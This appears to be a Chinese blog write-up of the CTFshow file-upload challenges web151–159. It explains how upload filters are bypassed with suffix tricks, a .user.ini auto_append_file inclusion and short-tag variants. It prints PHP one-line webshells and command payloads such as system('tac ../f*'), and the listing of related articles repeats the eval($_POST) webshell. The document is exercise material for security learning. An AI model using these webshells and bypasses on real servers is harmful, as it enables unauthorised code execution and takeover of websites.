CTFshow_文件上传

最新推荐文章于 2024-05-05 18:30:47 发布
最新推荐文章于 2024-05-05 18:30:47 发布
阅读量2.9k 收藏
点赞数
分类专栏: Web安全-CTFShow Web安全-文件上传 文章标签: 信息泄露 安全 CMS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/121454463
版权

文章目录

web151

上传图片,经过测试只能上传后缀为png的图片
抓包改数据:
在这里插入图片描述
在这里插入图片描述
使用蚁剑连接:
在这里插入图片描述
找到flag!
在这里插入图片描述

web152

做法和上题一样!

web153

继续之前的操作,但并没有上传成功:
在这里插入图片描述后缀改成php3发现可以上传成功,但不能被解析,也就不能蚁剑连接

在这里插入图片描述在这里插入图片描述
访问upload时发现存在index.php文件
在这里插入图片描述

使用user.ini绕过
.user.ini

原理: 指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件,巧合的是这题upload目录下有个index.php所以这种方式是可以成功的。

1、上传.user.ini内容为 auto_append_file=“xxx” xxx为我们上传的文件名。这样就在每个php文件上包含了我们的木马文件。
在这里插入图片描述
2、上传木马,因为有文件名限制,命名为shell.png
bp抓包后改后缀为shell.txt
可以访问得到shell.txt
在这里插入图片描述

3、访问同目录下的index.php,此时木马已经解析到这里在这里插入图片描述

蚁剑连接:

在这里插入图片描述
登陆后可以看到我们上传的.user.ini文件以及shell.txt:
在这里插入图片描述
在这里插入图片描述

web154

发现依旧存在index.php这个文件
继续上传.user.ini文件
在这里插入图片描述上传shell.txt
发现上传失败了;
在这里插入图片描述经过测试发现过滤了php
看了看大师傅们的博客发现要用到短标签绕过,也可以大写绕过:

1:<?= eval($_POST[A]);?>
2:<? eval($_POST[A]);?>
3:<% eval($_POST[A]);%>
上面的只有第一个可以用

在这里插入图片描述在这里插入图片描述

蚁剑连接:
在这里插入图片描述
在这里插入图片描述

web155

.user.ini+短标签绕过(同上)

web156

依旧是先上传.user.ini,之后经过测试发现上传木马的时候不仅过滤了php,同时也过滤了[],可以用{}代替!其他的同上
在这里插入图片描述
或者直接省略蚁剑连接:之前的几关也可以
在这里插入图片描述

web157

测试发现多过滤了{};
使用:
<?= system('tac ../f*')?>
然后访问upload/index.php即可:
在这里插入图片描述

web158

同上

web159

在这里插入图片描述不含()时上传成功,当含有()时报错,显然又过滤了()
我们用反单引号绕过:

<?= `cat ../f*`?>

在这里插入图片描述
这题又过滤了system

Stray.io
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow文件
weixin_53955759的博客
04-15 760
web151 前台校验不可靠,前端验证 上png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上user.ini进行文件绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
【威胁分析】<?php eval($_POST[‘a‘]);?>
sinat_35058227的博客
08-29 5201
请求体解码为: <?php eval($_POST['a']);?> 一句话木马。 eval():将括号内的字符串解析为php代码。 $_POST[‘a’]:a=XXX,向后台输的参数 所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘posha’]的话,只要使用post输时在name为posha的值中写入任何字符串,都可以当做php代码来执行。 利用示例: URL: XXX.php?a=XXX 威胁分析: 1、判断是否利用该方式攻击:
Web安全-一句话木马
liuwei0376的专栏
08-20 4042
概述 在很多的渗透过程中,渗透人员会上一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件漏洞,往目标网站中上一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
2024年最全CTFshow web入门——文件_ctfshow文件,给大家安排上
最新发布
2401_84520377的博客
05-05 981
一个图片木马,发现上不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上,bp抓包。
一句话木马
热门推荐
飞鱼计划
09-06 2万+
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们...
web渗透_一句话木马(webshell)_dvwa环境
摸鱼域的空气。
04-04 8099
厄薇娅·瑞尔说,今天是个好日子。 一、什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义) 而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。 也就是说,你想执行什么代码,.
【转】php eval函数用法
zzz的博客
07-06 1113
php eval ()函数 定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 语法 eval(phpcode) 提示 返回语句会立即终止对字符串的计算。 该函数对于在数据
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
寒假学习笔记3
yxltx_的博客
01-29 2944
File Upload(文件) 先来学习一下一句话木马的原理!!! 原理:我一句话木马用我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们递的数据,并把接收的数据递给一句话木马中执行命令的函数,进而执行命令。 例如: <?php @eval($_POST['a']);?> 其中eval就是执行命令的函数,$_POST['a']就是接收的数据。 eval函...
<?php eval($_post[cmd]);?>,php eval函数用法及相关技巧
weixin_42813171的博客
03-18 3902
eval函数可将字符串之中的变量值代入,通常用在处理数据库的数据上。eval将值代入字符串之中。语法: void eval(string code_str);回值: 无函式种类: 数据处理本函式可将字符串之中的变量值代入,通常用在处理数据库的数据上。参数 code_str 为欲处理的字符串。值得注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函式处理后的字符串会沿...
【php】eval
weixin_33734785的博客
05-01 229
2019独角兽企业重金招聘Python工程师标准>>> ...
BUUCTF [SUCTF 2019]CheckIn 1
weixin_45642610的博客
01-17 705
BUUCTF [SUCTF 2019]CheckIn 1 文件包含,一句话木马上。 直接上一句话木马<?php eval($_POST['a']);?> 非法后缀 那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp 都试试,都不行。 这时候可以用图片上。 在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入 GIF89a <script language=php>eval($_POST['a']);&l
php eval一句话木马干啥的,<?php eval($_POST[cmd]);?>一句话木马解读
weixin_39875503的博客
03-09 3658
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马header("content-Type:text/html;charset=gb2312");if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[...
Web渗透测试----3、文件漏洞
七天
12-23 3012
文章目录一、文件漏洞二、客户端校验上文件的方式及绕过2.1、客户端JS验证2.2.1、前端js验证代码2.2.2、绕过前端JS验证三、服务端校验文件的方式及绕过3.1、通过文件后缀验证及绕过3.2 、通过文件类型验证及绕过3.3 、通过文件内容验证及绕过3.4、WAF进行校验及绕过3.5、竞争上绕过3.6、.htaccess文件绕过3.7、根据操作系统特性进行绕过3.8、通过post和get方法绕过3.9、通过文件截断绕过攻击3.10、利用文件包含或解析漏洞绕过上四、文件漏洞的防御总结 .
CTFweb篇-一句话木马
weixin_44597701的博客
08-05 5432
什么是一句话木马 一句话木马就是将一段代码植入服务器中,然后通过蚁剑就可以直接拿到webshell 最简单的一句话木马: <?php @eval($_POST['attack']) ?> 通常这句话就能让密码为attack,至于为什么,这需要祥看蚁剑的原理 为了防止D盾的阻拦,经常可以使用不同的混淆来绕开D盾 一句话木马的条件 (1)木马上成功,未被杀; (2)知道木马的路径在哪; (3)上的木马能正常运行。 例题 先用御剑扫描一下 发现后台地址 然后进入输入root 密码空(至于为什
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值